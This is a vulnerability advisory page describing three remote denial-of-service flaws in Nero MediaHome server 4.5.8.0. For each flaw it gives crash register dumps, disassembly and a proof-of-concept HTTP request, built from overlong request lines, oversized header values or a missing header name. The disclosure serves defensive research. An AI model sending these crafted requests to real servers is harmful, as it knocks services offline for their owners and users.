logo
DATABASE RESOURCES PRICING ABOUT US

Nero MediaHome Multiple Remote DoS Vulnerabilities

Description

High-Tech Bridge Security Research Lab has discovered multiple DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely. 1) Off-by-one errors in Nero MediaHome server: CVE-2012-5876 1.1 The vulnerability exists due to an off-by-one error in NMMediaServerService.dll when handling HTTP requests with overly long request lines. A remote attacker can send multiple HTTP requests with request line of at least 135 168 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause immediate crash of Nero MediaHome server. **Crash details:** EIP: 7c921689 mov ecx,[ecx] EAX: 03b2a808 ( 62040072) -> (heap) EBX: 003e0000 ( 4063232) -> b@>@>" (heap) ECX: 00000000 ( 0) -> N/A EDX: 00000000 ( 0) -> N/A EDI: 03b2b000 ( 62042112) -> D (heap) ESI: 03b2a800 ( 62040064) -> (heap) EBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack) ESP: 0526f848 ( 86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack) +00: 003e0000 ( 4063232) -> b@>@>" (heap) +04: 00000022 ( 34) -> N/A +08: 003e0004 ( 4063236) -> b@>@>" (heap) +0c: 0526f88c ( 86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack) +10: 7c928ccd (2089979085) -> N/A +14: 00000000 ( 0) -> N/A **Disasm around:** 0x7c921664 mov ecx,[ebp+0x10] 0x7c921667 add eax,[ecx] 0x7c921669 cmp eax,0xfe00 0x7c92166e ja 0x7c920721 0x7c921674 cmp byte [ebp+0x14],0x0 0x7c921678 jnz 0x7c95ae10 0x7c92167e mov ecx,[esi+0xc] 0x7c921681 lea eax,[esi+0x8] 0x7c921684 mov edx,[eax] 0x7c921686 mov [ebp+0x8],ecx 0x7c921689 mov ecx,[ecx] 0x7c92168b cmp ecx,[edx+0x4] 0x7c92168e mov [ebp+0xc],edx 0x7c921691 jnz 0x7c921734 0x7c921697 cmp ecx,eax 0x7c921699 jnz 0x7c921734 0x7c92169f push esi 0x7c9216a0 push ebx 0x7c9216a1 call 0x7c920684 0x7c9216a6 mov eax,[ebp+0xc] 0x7c9216a9 mov ecx,[ebp+0x8] **Proof of Concept:** The following HTTP request, sent a number of times, will crash the vulnerable Nero MediaHome server: GET /[A * 135168 or more] HTTP/1.1 HOST: somehost.com ACCEPT: */* Accept-Encoding: None User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Connection: Close Accept-Transfer-Encoding: None 1.2 The vulnerability exists due insufficient validation of HTTP request header values in NMMediaServer.dll. A remote attacker can send a specially crafted HTTP request containing an overly long header value (at least 135 168 characters long) to port 54444/TCP, cause a heap-based buffer overflow and crash the vulnerable application. **Crash details:** EIP: 7c920a19 mov ecx,[ecx] EAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap) EBX: 003e0000 ( 4063232) -> Tp@>\+ (heap) ECX: 41414141 (1094795585) -> N/A EDX: 41414141 (1094795585) -> N/A EDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap) ESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap) EBP: 0527f828 ( 86505512) -> `' (stack) ESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack) +00: 003e0000 ( 4063232) -> Tp@>\+ (heap) +04: 00000021 ( 33) -> N/A +08: 003e0004 ( 4063236) -> Tp@>\+ (heap) +0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack) +10: 7c928ccd (2089979085) -> N/A +14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap) **Disasm around:** 0x7c9209f8 jnz 0x7c95af5f 0x7c9209fe mov al,[esi+0x5] 0x7c920a01 and al,0x10 0x7c920a03 test al,0x10 0x7c920a05 mov [edi+0x5],al 0x7c920a08 jnz 0x7c920aa0 0x7c920a0e mov ecx,[esi+0xc] 0x7c920a11 lea eax,[esi+0x8] 0x7c920a14 mov edx,[eax] 0x7c920a16 mov [ebp+0xc],ecx 0x7c920a19 mov ecx,[ecx] 0x7c920a1b cmp ecx,[edx+0x4] 0x7c920a1e mov [ebp+0x14],edx 0x7c920a21 jnz 0x7c921752 0x7c920a27 cmp ecx,eax 0x7c920a29 jnz 0x7c921752 0x7c920a2f push esi 0x7c920a30 push ebx 0x7c920a31 call 0x7c920684 0x7c920a36 mov eax,[ebp+0x14] 0x7c920a39 mov ecx,[ebp+0xc] **Proof of Concept:** The following HTTP request will crash the vulnerable Nero MediaHome server remotely: GET / HTTP/1.1 Host somehost.com User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: keep-alive Referer:[A * 265566] 2) NULL pointer dereference in Nero MediaHome server: CVE-2012-5877 2.1 The vulnerability exists due to a NULL pointer dereference error when handling HTTP request with missing HTTP header name. A remote attacker can send a specially crafted HTTP request with missing HTTP header name and crash Nero MediaHome server. **Crash details:** EIP: 10003171 mov [eax+0x18],ebp EAX: 00000000 ( 0) -> N/A EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap) ECX: 039cddea ( 60612074) -> localhost (heap) EDX: 039cddea ( 60612074) -> localhost (heap) EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap) ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap) EBP: 00000009 ( 9) -> N/A ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack) +00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap) +04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap) +08: 00000000 ( 0) -> N/A +0c: 00000001 ( 1) -> N/A +10: 000000b8 ( 184) -> N/A +14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap) **Disasm around:** 0x10003156 mov edx,[esi+0x8] 0x10003159 mov ebp,[esi+0xc] 0x1000315c push byte 0x1 0x1000315e push eax 0x1000315f push ecx 0x10003160 push ebx 0x10003161 mov [edi+0x40],esi 0x10003164 mov [esp+0x2c],edx 0x10003168 call 0x10002730 0x1000316d mov ecx,[esp+0x2c] 0x10003171 mov [eax+0x18],ebp 0x10003174 mov ebp,[esp+0x24] 0x10003178 add esp,0x10 0x1000317b mov [eax+0x14],ecx 0x1000317e mov edx,[ebp+0x8] 0x10003181 test edx,edx 0x10003183 mov [esp+0x14],edx 0x10003187 jnz 0x10002ff0 0x1000318d mov eax,[esp+0x24] 0x10003191 push eax 0x10003192 call 0x10002c20 **Proof of Concept:** The following HTTP request will crash Nero MediaHome server remotely: GET / HTTP/1.1 : somehost.com User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: keep-alive Referer: http://www.host.com


Affected Software


CPE Name Name Version
nero mediahome 4.5.8.0

Related